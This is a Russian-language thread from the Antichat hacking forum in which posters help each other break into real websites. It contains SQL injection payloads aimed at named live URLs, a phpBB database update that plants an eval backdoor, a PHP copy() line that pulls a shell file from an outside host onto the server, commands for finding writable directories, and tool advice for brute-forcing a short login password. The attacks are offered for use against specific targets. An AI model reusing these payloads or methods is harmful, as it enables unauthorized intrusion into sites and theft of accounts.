HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.11.2011, 03:20
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Цитата:
Сообщение от d1v  
http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
а дальше сам.
хинт: error based.
Спасибо огромное! ++
 
Ответить с цитированием

  #2  
Старый 08.11.2011, 03:35
теща
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
С нами: 10871526

Репутация: 131
По умолчанию

тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
 
Ответить с цитированием

  #3  
Старый 08.11.2011, 03:36
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами: 10333826

Репутация: 369


По умолчанию

Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;

че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)
 
Ответить с цитированием

  #4  
Старый 08.11.2011, 03:38
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
Сообщение от теща  
тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
BrutusA2
 
Ответить с цитированием

  #5  
Старый 08.11.2011, 04:03
теща
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
С нами: 10871526

Репутация: 131
По умолчанию

Цитата:
Сообщение от Strilo4ka  
BrutusA2
скачал AET2

сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?

поставил на перебор на TYPE HTTP (Form)

что не так сделал ?

там нету протокола https
 
Ответить с цитированием

  #6  
Старый 08.11.2011, 04:14
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
в этом параметре инъекции нет.
Ты помоему спешишь куда-то постоянно

В этом тоже есть:

http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+

Цитата:
Сообщение от Strilo4ka  
Зачем $_GET юзаете? =/
Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.
А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )

Или это какой то приватный метод, онли закрытые группы?

satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.

phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
 
Ответить с цитированием

  #7  
Старый 08.11.2011, 04:27
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами: 10333826

Репутация: 369


По умолчанию

Цитата:
Сообщение от KolosJey  
Ты помоему спешишь куда-то постоянно
В этом тоже есть:
http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+
А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )
Или это какой то приватный метод, онли закрытые группы?
satana8920
: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.
phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
пхпинфо вывод отлично allow_url_fopen On стоит блин ребят дайте код рабочий для заливки шелла плс
 
Ответить с цитированием

  #8  
Старый 08.11.2011, 04:33
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');
 
Ответить с цитированием

  #9  
Старый 08.11.2011, 04:58
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
Сообщение от KolosJey  
copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');
Copy() будет ограничена при safe_mode=on.

Лучше move_uploaded_file().

С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!):

find . -type d -perm 777 -print

find . -type f -perm 777 –print

Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные.
 
Ответить с цитированием

  #10  
Старый 08.11.2011, 05:10
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
Сообщение от теща  
скачал AET2
сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?
поставил на перебор на TYPE HTTP (Form)
что не так сделал ?
там нету протокола https
THC-Hydra работает с https. А вообще в гугле много инструментов.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...